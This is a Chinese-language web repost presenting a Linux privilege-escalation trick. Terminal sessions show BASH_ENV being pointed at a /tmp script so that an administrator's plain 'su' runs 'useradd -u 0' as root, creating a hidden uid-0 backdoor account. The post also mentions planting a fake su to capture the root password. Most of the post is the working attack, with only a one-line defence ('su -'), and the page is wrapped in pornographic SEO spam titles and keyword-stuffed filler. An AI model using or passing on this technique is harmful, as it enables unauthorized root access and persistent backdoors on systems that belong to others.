国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 系統(tǒng) > Linux > 正文

Linux的提權(quán)方法分享

2024-08-28 00:03:07
字體:
供稿:網(wǎng)友
  今天被朋友問到,linux如何提權(quán),這個其實是需要技巧的,今天就和大家分享一下linux系統(tǒng)是如何提權(quán)的。
  其實通常情況下,我們在執(zhí)行bash腳本的時候,有一個執(zhí)行過程,其中有一點比較重要:如果BASH_ENV被設(shè)置的話,它就會執(zhí)行BASH_ENV指向的腳本
  一個test:
  以下是引用片段:
  [xiaoyu@localdomain ~]$ echo $BASH_ENV
  [xiaoyu@localdomain ~]$ export BASH_ENV="/tmp/.bashrc"
  [xiaoyu@localdomain ~]$ echo $BASH_ENV
  /tmp/.bashrc
  [xiaoyu@localdomain ~]$ cat /tmp/.bashrc
  #!/bin/bash
  echo "Hello"
  [xiaoyu@localdomain ~]$ ls -l
  -rwxrwxr-x 1 xiaoyu xiaoyu 22 2008-09-11 05:54 test.sh
  [xiaoyu@localdomain ~]$ cat test.sh
  #!/bin/bash
  echo "kk"
  [xiaoyu@localdomain ~]$ ./test.sh
  Hello
  kk
  恩,很好,和我們預(yù)期的一樣。看看我們怎么利用。
  grep su ~/.bash_history
  顯示此用戶有使用su登錄root賬戶的特殊癖好/Article/UploadFiles/200809/20080912102542241.gif。以前我們遇到這種情況通常就是塞個fakesu.c進去。然后修改.bash_profile,建立個別名之類的東西。通過getpass來獲得root密碼,記錄,然后去除別名.....關(guān)鍵是管理員使用正確密碼登錄的時候也是會提示一次密碼錯誤。遇到傻點的管理員可能就放過這個細節(jié)了,再輸入一遍密碼就OK了。但是某些非人類admin會以最快的速度檢查系統(tǒng)被入侵的跡象,外加啥啥啥,而且這種管理員改 root密碼幾乎是肯定的了。所以偷取下來的密碼也沒啥用處。恩,聰明的X客們一定知道我要做什么了。呵呵,先看看環(huán)境變量su后在不
  以下是引用片段:
  [xiaoyu@localdomain ~]$ echo $BASH_ENV
  /tmp/.bashrc
  [xiaoyu@localdomain ~]$ su
  Password:
  [root@localdomain xiaoyu]# echo $BASH_ENV
  /tmp/.bashrc
  還在/Article/UploadFiles/200809/20080912102542241.gif,OK,實驗結(jié)束,實戰(zhàn):
  以下是引用片段:
  [xiaoyu@localdomain tmp]$ echo ’/usr/sbin/useradd -u 0 -o kk 2> /dev/null’ > /tmp/.bashrc
  [xiaoyu@localdomain tmp]$ cat /tmp/.bashrc
  /usr/sbin/useradd -u 0 -o kk 2> /dev/null
  [xiaoyu@localdomain tmp]$ grep kk /etc/passwd
  [xiaoyu@localdomain tmp]$ echo $BASH_ENV
  /tmp/.bashrc
  [xiaoyu@localdomain tmp]$ su
  Password:
  [root@localdomain tmp]# cd /home/xiaoyu
  [root@localdomain xiaoyu]# ./test.sh
  kk
  [root@localdomain xiaoyu]# grep kk /etc/passwd
  kk:x:0:503::/home/kk:/bin/bash
  [root@localdomain xiaoyu]#
  關(guān)于怎么安置,和fakesu一樣,在.bash_profile等地方export BASH_ENV變量。
  如果要避免這種情況,使用su -登錄root,估計沒幾個管理員記得這個指令吧。
總結(jié):
  Linux的提權(quán)技巧就為大家介紹到這來了,Linux的相關(guān)知識也是相當?shù)亩?希望能幫助到大家
發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 张北县| 瑞金市| 黄山市| 宁南县| 达尔| 神池县| 张家界市| 鄂托克前旗| 泰州市| 广平县| 曲水县| 进贤县| 昌邑市| 怀化市| 苍溪县| 丹江口市| 福泉市| 民和| 区。| 和平县| 铁岭县| 临漳县| 句容市| 章丘市| 体育| 温州市| 隆昌县| 东源县| 靖安县| 郧西县| 新津县| 哈尔滨市| 临武县| 东源县| 永春县| 固原市| 杂多县| 隆德县| 泸溪县| 灵石县| 汕头市|